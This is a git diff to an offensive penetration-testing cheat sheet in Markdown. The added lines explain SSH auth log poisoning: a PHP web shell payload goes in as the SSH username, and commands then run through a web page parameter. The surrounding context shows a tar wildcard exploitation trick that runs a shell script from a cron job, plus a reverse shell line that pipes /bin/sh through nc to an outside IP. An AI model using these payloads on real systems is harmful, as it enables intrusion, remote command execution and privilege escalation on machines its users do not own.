diff --git a/Cheat Sheet.md b/Cheat Sheet.md
index 3ef1399..4df8d03 100644
--- a/Cheat Sheet.md	
+++ b/Cheat Sheet.md	
@@ -118,6 +118,14 @@ $ kill %1
 ### SSH Port Forwarding
 `ssh -L <port_that_is_blockd_>:localhost:<map_blocked_port> <username>@<ip>`
 
+### SSH auth log poisoning
+
+Login as any user to see that it gets logged then try to login with a malicious php code
+
+`ssh '<?php system($_GET['a']); ?>'@192.168.43.2` 
+
+Then `http://ip/page?a=whoami;`
+
 ### Tar Exploitation
 
 When ever you see a cronjob running with a command `cd /<user>/andre/backup tar -zcf /<folder>/filetar.gz *` go to that folder from which a backup is being created and running these command in that directory <br/ >
@@ -126,6 +134,7 @@ echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0</tmp/lhennp | /bin/sh >/tmp/lhen
 echo "" > "--checkpoint-action=exec=sh shell.sh"
 echo "" > --checkpoint=1
 ```
+
 ### Binary Exploits
 
 If there is a certain command running in a binary example `date` so we can create our own binary and add `/bin/bash` to and path so it gets executed<br/>